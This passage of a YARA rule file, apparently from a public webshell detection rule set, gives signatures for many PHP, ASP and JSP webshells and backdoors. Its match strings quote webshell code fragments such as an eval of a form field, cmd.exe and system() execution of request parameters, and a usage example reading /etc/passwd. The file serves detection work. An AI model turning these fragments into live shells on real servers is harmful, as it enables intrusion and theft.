   		author = "Florian Roth"
   		hash = "ef2c567b4782c994db48de0168deb29c812f7204"
   	strings:
   		$s0 = "Common php webshells. Do not host the file(s) in your server!" fullword
   		$s1 = "php-webshells" fullword
   	condition:
   		all of them
rule webshell_DarkBlade1_3_asp_indexx {
   	// DarkBlade indexx.asp: a single ASP Const holding a pipe-separated list
   	// of names (command, Radmin, NTAuThenabled, FilterIp, ...). The literal is
   	// truncated mid-list, so it matches the prefix of that declaration.
   	meta:
   		description = "Web Shell - file indexx.asp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "b7f46693648f534c2ca78e3f21685707"
   	strings:
   		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
   	condition:
   		all of them
rule WebShell_backupsql {
   	// backupsql.php: a database backup script that ships dumps by e-mail
   	// attachment or ncftpput (credentials on the command line). Any two of
   	// five; $s0 (MIME header assembly) and $s2 (a comment) are generic, so
   	// benign scripts derived from the same code base will also match.
   	meta:
   		description = "PHP Webshells Github Archive - file backupsql.php"
   		author = "Florian Roth"
   		hash = "863e017545ec8e16a0df5f420f2d708631020dd4"
   	strings:
   		$s0 = "$headers .= \"\\nMIME-Version: 1.0\\n\" .\"Content-Type: multipart/mixed;\\n\" ."
   		$s1 = "$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplog"
   		$s2 = "* as email attachment, or send to a remote ftp server by" fullword
   		$s16 = "* Neagu Mihai<neagumihai@hotmail.com>" fullword
   		$s17 = "$from    = \"Neu-Cool@email.com\";  // Who should the emails be sent from?, may "
   	condition:
   		2 of them
rule FSO_s_phvayv {
   	// phvayv.php: one markup fragment (a textarea with wrap="OFF" and XXXX
   	// placeholder text). File-identity match only; no behavioural content.
   	meta:
   		description = "Webshells Auto-generated - file phvayv.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "205ecda66c443083403efb1e5c7f7878"
   	strings:
   		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
   	condition:
   		all of them
rule webshell_webshells_new_pppp {
   	// pppp.php: contact line, the GET "hackers"=="2b" gate, and a blog URL.
   	// One string suffices, and $s6 is only a URL, so any page that links
   	// that site will match; $s3 is the line that actually evidences the shell.
   	meta:
   		description = "Web shells - generated from file pppp.php"
   		author = "Florian Roth"
   		date = "2014/03/28"
   		score = 70
   		hash = "cf01cb6e09ee594545693c5d327bdd50"
   	strings:
   		$s0 = "Mail: chinese@hackermail.com" fullword
   		$s3 = "if($_GET[\"hackers\"]==\"2b\"){if ($_SERVER['REQUEST_METHOD'] == 'POST') { echo "
   		$s6 = "Site: http://blog.weili.me" fullword
   	condition:
   		1 of them
rule rootshell_php {
   	// rootshell.php: origin domain, the "infected by $owner" banner, the
   	// Include! form button, and the write-failure message. Two of four.
   	meta:
   		description = "Semi-Auto-generated  - file rootshell.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "265f3319075536030e59ba2f9ef3eac6"
   	strings:
   		$s0 = "shells.dl.am"
   		$s1 = "This server has been infected by $owner"
   		$s2 = "<input type=\"submit\" value=\"Include!\" name=\"inc\"></p>"
   		$s4 = "Could not write to file! (Maybe you didn't enter any text?)"
   	condition:
   		2 of them
rule WebShell__Small_Web_Shell_by_ZaCo_small_zaco_zacosmall {
   	// ZaCo small shell (four file variants): lines of its MySQL dump routine
   	// (select_db error text, Content-Length header for the dump, completion
   	// message). Two of four; all four literals are dump-specific.
   	meta:
   		description = "PHP Webshells Github Archive - from files Small Web Shell by ZaCo.php, small.php, zaco.php, zacosmall.php"
   		author = "Florian Roth"
   		super_rule = 1
   		hash0 = "b148ead15d34a55771894424ace2a92983351dda"
   		hash1 = "e4ba288f6d46dc77b403adf7d411a280601c635b"
   		hash2 = "e5713d6d231c844011e9a74175a77e8eb835c856"
   		hash3 = "1b836517164c18caf2c92ee2a06c645e26936a0c"
   	strings:
   		$s2 = "if(!$result2)$dump_file.='#error table '.$rows[0];" fullword
   		$s4 = "if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');" fullword
   		$s6 = "header('Content-Length: '.strlen($dump_file).\"\\n\");" fullword
   		$s20 = "echo('Dump for '.$db_dump.' now in '.$to_file);" fullword
   	condition:
   		2 of them
rule jsp_reverse_jsp {
   	// jsp-reverse.jsp: header comment, title, and the michaeldaw.org credit
   	// URL. Two of three; the URL alone is shared with other samples from the
   	// same site and does not fire by itself.
   	meta:
   		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "8b0e6779f25a17f0ffb3df14122ba594"
   	strings:
   		$s0 = "// backdoor.jsp"
   		$s1 = "JSP Backdoor Reverse Shell"
   		$s2 = "http://michaeldaw.org"
   	condition:
   		2 of them
rule webshell_php_list {
   	// list.php (directory/file lister): header comment, the listing echo with
   	// ?file= links, and the author credit. One of three suffices.
   	meta:
   		description = "Web Shell - file list.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "922b128ddd90e1dc2f73088956c548ed"
   	strings:
   		$s1 = "// list.php = Directory & File Listing" fullword
   		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
   		$s9 = "// by: The Dark Raver" fullword
   	condition:
   		1 of them
rule h4ntu_shell__powered_by_tsoi_ {
   	// h4ntu shell: the product name, or its system() line that redirects
   	// command output through /tmp/cmdtemp. Either one fires.
   	meta:
   		description = "Semi-Auto-generated  - file h4ntu shell [powered by tsoi].txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "06ed0b2398f8096f1bebf092d0526137"
   	strings:
   		$s0 = "h4ntu shell"
   		$s1 = "system(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");"
   	condition:
   		1 of them
rule WebShell_php_backdoor {
   	// php-backdoor.php (z0mbie, 2003): author comment, the "dir" request
   	// parameter check, listing links via $PHP_SELF, and the command form.
   	// One of five suffices; $s6 (the credit comment) is the most specific.
   	meta:
   		description = "PHP Webshells Github Archive - file php-backdoor.php"
   		author = "Florian Roth"
   		hash = "b190c03af4f3fb52adc20eb0f5d4d151020c74fe"
   	strings:
   		$s5 = "http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix" fullword
   		$s6 = "// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombi"
   		$s11 = "if(!isset($_REQUEST['dir'])) die('hey,specify directory!');" fullword
   		$s13 = "else echo \"<a href='$PHP_SELF?f=$d/$dir'><font color=black>\";" fullword
   		$s15 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input "
   	condition:
   		1 of them
rule Webshell_and_Exploit_CN_APT_HK : Webshell
   {
   // Fires on $a0 alone (a <script> tag loading o.js from java-se.com) or on
   // both $s* strings together (a password field plus a hidden doing=login
   // field). The $s* pair is an ordinary login form and carries less weight
   // than $a0; a hit on the pair alone deserves manual confirmation.
   meta:
   	author = "Florian Roth"
   	description = "Webshell and Exploit Code in relation with APT against Honk Kong protesters"
   	date = "10.10.2014"
   	score = 50
   strings:
   	$a0 = "<script language=javascript src=http://java-se.com/o.js</script>" fullword
   	$s0 = "<span style=\"font:11px Verdana;\">Password: </span><input name=\"password\" type=\"password\" size=\"20\">"
   	$s1 = "<input type=\"hidden\" name=\"doing\" value=\"login\">"
   condition:
   	$a0 or ( all of ($s*) )
rule multiple_webshells_0005 {
   	// r57 / SnIpEr_SA / spy family super-rule: an entry from the shell's
   	// English language table (eng_text71, CHOWN help) or the POSTed
   	// s_mask/m search handler. Either one fires.
   	meta:
   		description = "Semi-Auto-generated  - from files r577.php.php.txt, SnIpEr_SA Shell.php.txt, r57.php.php.txt, r57 Shell.php.php.txt, spy.php.php.txt, s.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_r577_php_php_SnIpEr_SA_Shell_php_r57_php_php_r57_Shell_php_php_spy_php_php_s_php_php"
   		hash0 = "0714f80f35c1fddef1f8938b8d42a4c8"
   		hash1 = "911195a9b7c010f61b66439d9048f400"
   		hash2 = "eddf7a8fde1e50a7f2a817ef7cece24f"
   		hash3 = "8023394542cddf8aee5dec6072ed02b5"
   		hash4 = "eed14de3907c9aa2550d95550d1a2d5f"
   		hash5 = "817671e1bdc85e04cc3440bbd9288800"
   	strings:
   		$s2 = "'eng_text71'=>\"Second commands param is:\\r\\n- for CHOWN - name of new owner o"
   		$s4 = "if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult"
   	condition:
   		1 of them
rule fmlibraryv3 {
   	// fmlibraryv3.asp: one line building an UPDATE statement by string
   	// concatenation from "tablename" and ExeNewRsValues. SQL-by-concatenation
   	// is common in legacy ASP; the exact variable names are what pin the file.
   	meta:
   		description = "Webshells Auto-generated - file fmlibraryv3.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "c34c248fed6d5a20d8203924a2088acc"
   	strings:
   		$s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
   	condition:
   		all of them
rule EditServer_Webshell {
   	// EditServer.exe -- a Windows binary, not a script: UI strings of a
   	// server/implant configurator (configured-server message, 32-character
   	// password limit, a "Set Process Name To Inject DLL" menu item). All three.
   	meta:
   		description = "Webshells Auto-generated - file EditServer.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "f945de25e0eba3bdaf1455b3a62b9832"
   	strings:
   		$s2 = "Server %s Have Been Configured"
   		$s5 = "The Server Password Exceeds 32 Characters"
   		$s8 = "9--Set Procecess Name To Inject DLL"
   	condition:
   		all of them
rule webshell_Server_Variables {
   	// "Server Variables.asp": a loop over Request.ServerVariables and the
   	// table heading. Both strings are generic ASP diagnostic markup, so
   	// expect matches on benign server-variable dump pages as well; treat a
   	// hit as informational until the rest of the file is reviewed.
   	meta:
   		description = "Web Shell - file Server Variables.asp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "47fb8a647e441488b30f92b4d39003d7"
   	strings:
   		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
   		$s9 = "Variable Name</B></font></p>" fullword
   	condition:
   		all of them
rule webshell_webshells_new_JJJsp2 {
   	// JJJsp2.jsp: fragments of its JDBC connector (DriverManager.getConnection
   	// assembled from a split config string, Oracle metadata branch) and of its
   	// directory-listing builder. One of four suffices.
   	meta:
   		description = "Web shells - generated from file JJJsp2.jsp"
   		author = "Florian Roth"
   		date = "2014/03/28"
   		score = 70
   		hash = "5a9fec45236768069c99f0bfd566d754"
   	strings:
   		$s2 = "QQ(cs, z1, z2, sb,z2.indexOf(\"-to:\")!=-1?z2.substring(z2.indexOf(\"-to:\")+4,z"
   		$s8 = "sb.append(l[i].getName() + \"/\\t\" + sT + \"\\t\" + l[i].length()+ \"\\t\" + sQ"
   		$s10 = "ResultSet r = s.indexOf(\"jdbc:oracle\")!=-1?c.getMetaData()"
   		$s11 = "return DriverManager.getConnection(x[1].trim()+\":\"+x[4],x[2].equalsIgnoreCase("
   	condition:
   		1 of them
rule FSO_s_casus15_2 {
   	// casus15.php: a single copy() call on $dosya_gonder (apparently a
   	// Turkish variable name for the uploaded file). The variable name is the
   	// whole signature; the spacing inside "copy ( " must match exactly.
   	meta:
   		description = "Webshells Auto-generated - file casus15.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "8d155b4239d922367af5d0a1b89533a3"
   	strings:
   		$s0 = "copy ( $dosya_gonder"
   	condition:
   		all of them
rule jspshall_jsp {
   	// jspshall.jsp: author tag kj021320, the systemTools() dispatch case, and
   	// a file-listing row. Two of three.
   	meta:
   		description = "Semi-Auto-generated  - file jspshall.jsp.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "efe0f6edaa512c4e1fdca4eeda77b7ee"
   	strings:
   		$s0 = "kj021320"
   		$s1 = "case 'T':systemTools(out);break;"
   		$s2 = "out.println(\"<tr><td>\"+ico(50)+f[i].getName()+\"</td><td> file"
   	condition:
   		2 of them
rule WebShell_lamashell {
   	// lamashell v3.0 (the archive copy; lamashell_php above covers the same
   	// family): Execute button check, POSTed "king" command, title, ASCII-art
   	// line, and the default "ls -lah". Two of six. $s16 is the HTML 4 loose
   	// DTD URL found in countless benign pages and can count as one of the
   	// two, so the evidence lies in whichever other string matched.
   	meta:
   		description = "PHP Webshells Github Archive - file lamashell.php"
   		author = "Florian Roth"
   		hash = "b71181e0d899b2b07bc55aebb27da6706ea1b560"
   	strings:
   		$s0 = "if(($_POST['exe']) == \"Execute\") {" fullword
   		$s8 = "$curcmd = $_POST['king'];" fullword
   		$s16 = "\"http://www.w3.org/TR/html4/loose.dtd\">" fullword
   		$s18 = "<title>lama's'hell v. 3.0</title>" fullword
   		$s19 = "_|_  O    _    O  _|_" fullword
   		$s20 = "$curcmd = \"ls -lah\";" fullword
   	condition:
   		2 of them
rule webshell_php_fbi {
   	// fbi.php: one literal of Dutch MySQL type-group labels ("Getallen",
   	// "Datum en tijd", ...). This is localisation text, presumably from an
   	// embedded database-admin component, so a hit identifies the file rather
   	// than shell behaviour, and Dutch-localised DB tools may match too.
   	meta:
   		description = "Web Shell - file fbi.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "1fb32f8e58c8deb168c06297a04a21f1"
   	strings:
   		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
   	condition:
   		all of them
rule webshell_minupload {
   	// minupload.jsp: the Upload submit button and the "path" parameter being
   	// re-decoded from ISO-8859. Both required. $s0 carries three trailing
   	// spaces inside the literal and is fullword, so the markup must match to
   	// the byte.
   	meta:
   		description = "Web Shell - file minupload.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "ec905a1395d176c27f388d202375bdf9"
   	strings:
   		$s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">   " fullword
   		$s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859"
   	condition:
   		all of them
rule shankar_php_php {
   	// shankar.php: the author tag "ShAnKaR" is mandatory, plus one of two
   	// form fragments (DB checkbox, result paging input). The author string is
   	// short and unanchored, so the $s* requirement is what gives it specificity.
   	meta:
   		description = "Semi-Auto-generated  - file shankar.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
   	strings:
   		$sAuthor = "ShAnKaR"
   		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
   		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
   	condition:
   		1 of ($s*) and $sAuthor
rule SoakSoak_Infected_Wordpress {
   	// SoakSoak WordPress injection: the FuncQueueObject() function that
   	// enqueues "swfobject" and its add_action hook. All three required.
   	// wp_enqueue_script("swfobject") is a legitimate WordPress API call on
   	// its own; the FuncQueueObject name is the distinctive part.
   	meta:
   		description = "Detects a SoakSoak infected Wordpress site http://goo.gl/1GzWUX"
   		reference = "http://goo.gl/1GzWUX"
   		author = "Florian Roth"
   		date = "2014/12/15"
   		score = 60
   	strings:
   		$s0 = "wp_enqueue_script(\"swfobject\");" ascii fullword
   		$s1 = "function FuncQueueObject()" ascii fullword
   		$s2 = "add_action(\"wp_enqueue_scripts\", 'FuncQueueObject');" ascii fullword
   	condition:
   		all of ($s*)
rule WebShell_CasuS_1_5 {
   	// CasuS 1.5: Turkish banner showing the shell's own URL, a
   	// get_cfg_var("fonksiyonlary_kapat") read, and a file_exists("F:\\") drive
   	// probe. One of three; $s18 (a bare drive-letter test) is the weakest and
   	// alone satisfies the rule.
   	meta:
   		description = "PHP Webshells Github Archive - file CasuS 1.5.php"
   		author = "Florian Roth"
   		hash = "7eee8882ad9b940407acc0146db018c302696341"
   	strings:
   		$s2 = "<font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HO"
   		$s8 = "$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");" fullword
   		$s18 = "if (file_exists(\"F:\\\\\")){" fullword
   	condition:
   		1 of them
rule webshell_ASP_cmd {
   	// cmd.asp: one inline expression printing \\ComputerName\UserName from an
   	// oScriptNet object (presumably WScript.Network). Single literal; file
   	// identity rather than behaviour.
   	meta:
   		description = "Web Shell - file cmd.asp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "97af88b478422067f23b001dd06d56a9"
   	strings:
   		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
   	condition:
   		all of them
rule icyfox007v1_10_rar_Folder_asp {
   	// icyfox007 asp.asp: a one-line server-side JScript block that eval()s
   	// the "#" form field. The whole shell is this literal.
   	meta:
   		description = "Webshells Auto-generated - file asp.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "2c412400b146b7b98d6e7755f7159bb9"
   	strings:
   		$s0 = "<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form('#')+'')</SCRIPT>"
   	condition:
   		all of them
rule PhpShell {
   	// PhpShell.php: the credit link to the original PhpShell project wiki.
   	// A hit means the (openly published) PhpShell is present; whether that is
   	// an intrusion or an admin's own install has to come from context.
   	meta:
   		description = "Webshells Auto-generated - file PhpShell.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "539baa0d39a9cf3c64d65ee7a8738620"
   	strings:
   		$s2 = "href=\"http://www.gimpster.com/wiki/PhpShell\">www.gimpster.com/wiki/PhpShell</a>."
   	condition:
   		all of them
rule webshell_Worse_Linux_Shell {
   	// "Worse Linux Shell": one system("mv ...") call moving the "_upl" upload's
   	// temp file into $currentWD. Single literal, truncated before the
   	// destination filename.
   	meta:
   		description = "Web Shell - file Worse Linux Shell.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
   	strings:
   		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
   	condition:
   		all of them
rule FSO_s_test {
   	// test.php: writes the word "test" plus CRLF to a file -- a write-access
   	// probe. Both strings are trivial individually; the Turkish-looking
   	// variable name $yazi together with the fwrite() is what pins the file.
   	meta:
   		description = "Webshells Auto-generated - file test.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "82cf7b48da8286e644f575b039a99c26"
   	strings:
   		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
   		$s2 = "fwrite ($fp, \"$yazi\");"
   	condition:
   		all of them
rule HYTop_DevPack_server {
   	// HYTop DevPack server.asp: a single HTML comment marker
   	// ("<!-- PageServer Below -->"). File identity only.
   	meta:
   		description = "Webshells Auto-generated - file server.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "1d38526a215df13c7373da4635541b43"
   	strings:
   		$s0 = "<!-- PageServer Below -->"
   	condition:
   		all of them
rule PHP_sh {
   	// sh.php: a prompt string built from $SERVER_NAME concatenated with
   	// exec("pwd"). Single literal.
   	meta:
   		description = "Webshells Auto-generated - file sh.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "1e9e879d49eb0634871e9b36f99fe528"
   	strings:
   		$s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
   	condition:
   		all of them
rule r57shell_2 {
   	// r57shell.php: the disk free/total display line built with ws() and
   	// view_size(). Single literal. The meta hash is the same file as hash3 of
   	// multiple_webshells_0005, so both rules are expected to fire together.
   	meta:
   		description = "Webshells Auto-generated - file r57shell.php"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "8023394542cddf8aee5dec6072ed02b5"
   	strings:
   		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
   	condition:
   		all of them
rule webshell_jsp_cmdjsp_2 {
   	// cmdjsp.jsp: Runtime.exec("cmd.exe /C " + cmd) plus the form posting
   	// back to cmdjsp.jsp. Both required; the form action ties it to the
   	// original filename, so a renamed copy only matches $s0.
   	meta:
   		description = "Web Shell - file cmdjsp.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "1b5ae3649f03784e2a5073fa4d160c8b"
   	strings:
   		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword
   		$s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
   	condition:
   		all of them
rule multiple_webshells_0032 {
   	// nixrem / c99shell family super-rule: the paged /etc/passwd viewer
   	// variables ($nixpasswd, $nixpwdperpage), posix_kill(), and the uid
   	// echo. Two of four; $s3 is tiny but fullword and variable-name-specific.
   	meta:
   		description = "Semi-Auto-generated  - from files nixrem.php.php.txt, c99shell_v1.0.php.php.txt, c99php.txt, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_nixrem_php_php_c99shell_v1_0_php_php_c99php_NIX_REMOTE_WEB_SHELL_v_0_5_alpha_Lite_Public_Version_php"
   		hash0 = "40a3e86a63d3d7f063a86aab5b5f92c6"
   		hash1 = "d8ae5819a0a2349ec552cbcf3a62c975"
   		hash2 = "9e9ae0332ada9c3797d6cee92c2ede62"
   		hash3 = "f3ca29b7999643507081caab926e2e74"
   	strings:
   		$s0 = "$num = $nixpasswd + $nixpwdperpage;" fullword
   		$s1 = "$ret = posix_kill($pid,$sig);" fullword
   		$s2 = "if ($uid) {echo join(\":\",$uid).\"<br>\";}" fullword
   		$s3 = "$i = $nixpasswd;" fullword
   	condition:
   		2 of them
rule zacosmall_php {
   	// zacosmall.php: random suffix generation ($sj98), dump assembly from
   	// $rows2, and the dump_{db}_{table} download filename. Two of three.
   	meta:
   		description = "Semi-Auto-generated  - file zacosmall.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "5295ee8dc2f5fd416be442548d68f7a6"
   	strings:
   		$s0 = "rand(1,99999);$sj98"
   		$s1 = "$dump_file.='`'.$rows2[0].'`"
   		$s3 = "filename=\\\"dump_{$db_dump}_${table_d"
   	condition:
   		2 of them
rule WebShell_Generic_PHP_7 {
   	// "Mysql interface" / "MySQL Web Interface" super-rule: dumpTable/dumpDB
   	// action handlers, the Content-disposition header for the .sql download,
   	// and the username display. Two of four. These files are MySQL web admin
   	// tools rather than command shells; copies an admin deployed on purpose
   	// will match just the same.
   	meta:
   		description = "PHP Webshells Github Archive - from files Mysql interface v1.0.php, MySQL Web Interface Version 0.8.php, Mysql_interface_v1.0.php, MySQL_Web_Interface_Version_0.8.php"
   		author = "Florian Roth"
   		super_rule = 1
   		hash0 = "de98f890790756f226f597489844eb3e53a867a9"
   		hash1 = "128988c8ef5294d51c908690d27f69dffad4e42e"
   		hash2 = "fd64f2bf77df8bcf4d161ec125fa5c3695fe1267"
   		hash3 = "715f17e286416724e90113feab914c707a26d456"
   	strings:
   		$s0 = "header(\"Content-disposition: filename=$filename.sql\");" fullword
   		$s1 = "else if( $action == \"dumpTable\" || $action == \"dumpDB\" ) {" fullword
   		$s2 = "echo \"<font color=blue>[$USERNAME]</font> - \\n\";" fullword
   		$s4 = "if( $action == \"dumpTable\" )" fullword
   	condition:
   		2 of them
rule webshell_PHP_c37 {
   	// c37.php: a C/C++ extension array from its file-type table and one line
   	// of the directory iterator ($F, $dirFILE, $eXT). Both required.
   	meta:
   		description = "Web Shell - file c37.php"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		hash = "d01144c04e7a46870a8dd823eb2fe5c8"
   	strings:
   		$s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj'),"
   		$s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE],"
   	condition:
   		all of them
rule portlessinst {
   	// portlessinst.exe -- a Windows binary: a registry-open failure message
   	// plus two short fragments that look like partial or obfuscated data
   	// rather than readable text. All three required, so this is a tight,
   	// single-build match; a recompile is likely to be missed.
   	meta:
   		description = "Webshells Auto-generated - file portlessinst.exe"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "74213856fc61475443a91cd84e2a6c2f"
   	strings:
   		$s2 = "Fail To Open Registry"
   		$s3 = "f<-WLEggDr\""
   		$s6 = "oMemoryCreateP"
   	condition:
   		all of them
rule webshell_201_3_ma_download {
   	// JSP file-manager super-rule (201.jsp, 3.jsp, ma.jsp, download.jsp):
   	// three tooltip titles from its UI -- upload to cwd, launch command, and
   	// recursive delete. All three required.
   	meta:
   		description = "Web Shell - from files 201.jsp, 3.jsp, ma.jsp, download.jsp"
   		author = "Florian Roth"
   		date = "2014/01/28"
   		score = 70
   		super_rule = 1
   		hash0 = "a7e25b8ac605753ed0c438db93f6c498"
   		hash1 = "fb8c6c3a69b93e5e7193036fd31a958d"
   		hash2 = "4cc68fa572e88b669bce606c7ace0ae9"
   		hash3 = "fa87bbd7201021c1aefee6fcc5b8e25a"
   	strings:
   		$s0 = "<input title=\"Upload selected file to the current working directory\" type=\"Su"
   		$s5 = "<input title=\"Launch command in current directory\" type=\"Submit\" class=\"but"
   		$s6 = "<input title=\"Delete all selected files and directories incl. subdirs\" class="
   	condition:
   		all of them
rule WebShell_simple_backdoor {
   	// simple-backdoor.php, archive copy: all nine lines including the DK /
   	// michaeldaw.org header comments and indentation-sensitive fullword lines
   	// ("        die;", "        system($cmd);"). A reformatted, trimmed or
   	// re-commented copy fails this rule; webshell_simple_backdoor (same file,
   	// 2 of 3 code lines) is the looser counterpart and should catch those.
   	meta:
   		description = "PHP Webshells Github Archive - file simple-backdoor.php"
   		author = "Florian Roth"
   		hash = "edcd5157a68fa00723a506ca86d6cbb8884ef512"
   	strings:
   		$s0 = "<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->" fullword
   		$s1 = "<!--    http://michaeldaw.org   2006    -->" fullword
   		$s2 = "Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd" fullword
   		$s3 = "        echo \"</pre>\";" fullword
   		$s4 = "        $cmd = ($_REQUEST['cmd']);" fullword
   		$s5 = "        echo \"<pre>\";" fullword
   		$s6 = "if(isset($_REQUEST['cmd'])){" fullword
   		$s7 = "        die;" fullword
   		$s8 = "        system($cmd);" fullword
   	condition:
   		all of them
rule HYTop2006_rar_Folder_2006 {
   	// HYTop 2006.asp: a concatenation onto a variable named strBackDoor. The
   	// variable name is the indicator; the literal ends in a space, so it only
   	// matches the "strBackDoor = strBackDoor & ..." continuation form.
   	meta:
   		description = "Webshells Auto-generated - file 2006.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "c19d6f4e069188f19b08fa94d44bc283"
   	strings:
   		$s6 = "strBackDoor = strBackDoor "
   	condition:
   		all of them
rule lurm_safemod_on_cgi {
   	// lurm_safemod_on.cgi (Perl CGI shell): banner, the <<KONEC>> delimiter
   	// line, and the commented-out default-password line. One of three.
   	meta:
   		description = "Semi-Auto-generated  - file lurm_safemod_on.cgi.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		hash = "5ea4f901ce1abdf20870c214b3231db3"
   	strings:
   		$s0 = "Network security team :: CGI Shell" fullword
   		$s1 = "#########################<<KONEC>>#####################################" fullword
   		$s2 = "##if (!defined$param{pwd}){$param{pwd}='Enter_Password'};##" fullword
   	condition:
   		1 of them
rule multiple_webshells_0006 {
   	// c99shell / SsEs / ctt_sh super-rule keyed on data, not code: base64
   	// chunks of the embedded icon images ("R0lGODlh" is the base64 form of a
   	// GIF header). Two of three. Any script reusing the same inline icons
   	// matches, regardless of what its code does.
   	meta:
   		description = "Semi-Auto-generated  - from files c99shell_v1.0.php.php.txt, c99php.txt, SsEs.php.php.txt, ctt_sh.php.php.txt"
   		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
   		super_rule = 1
   		was = "_c99shell_v1_0_php_php_c99php_SsEs_php_php_ctt_sh_php_php"
   		hash0 = "d8ae5819a0a2349ec552cbcf3a62c975"
   		hash1 = "9e9ae0332ada9c3797d6cee92c2ede62"
   		hash2 = "6cd50a14ea0da0df6a246a60c8f6f9c9"
   		hash3 = "671cad517edd254352fe7e0c7c981c39"
   	strings:
   		$s0 = "\"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze\""
   		$s2 = "\"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm\""
   		$s4 = "\"R0lGODlhFAAUAKL/AP/4/8DAwH9/AP/4AL+/vwAAAAAAAAAAACH5BAEAAAEALAAAAAAUABQAQAMo\""
   	condition:
   		2 of them
rule FSO_s_EFSO_2 {
   	// EFSO_2.asp: two fragments of what looks like Microsoft Script Encoder
   	// output (the "@#@&" tokens). Both required. Because every byte of an
   	// encoded file depends on its plaintext, this pins exactly one encoded
   	// variant; a re-encoded or edited copy will not match.
   	meta:
   		description = "Webshells Auto-generated - file EFSO_2.asp"
   		author = "Yara Bulk Rule Generator by Florian Roth"
   		hash = "a341270f9ebd01320a7490c12cb2e64c"
   	strings:
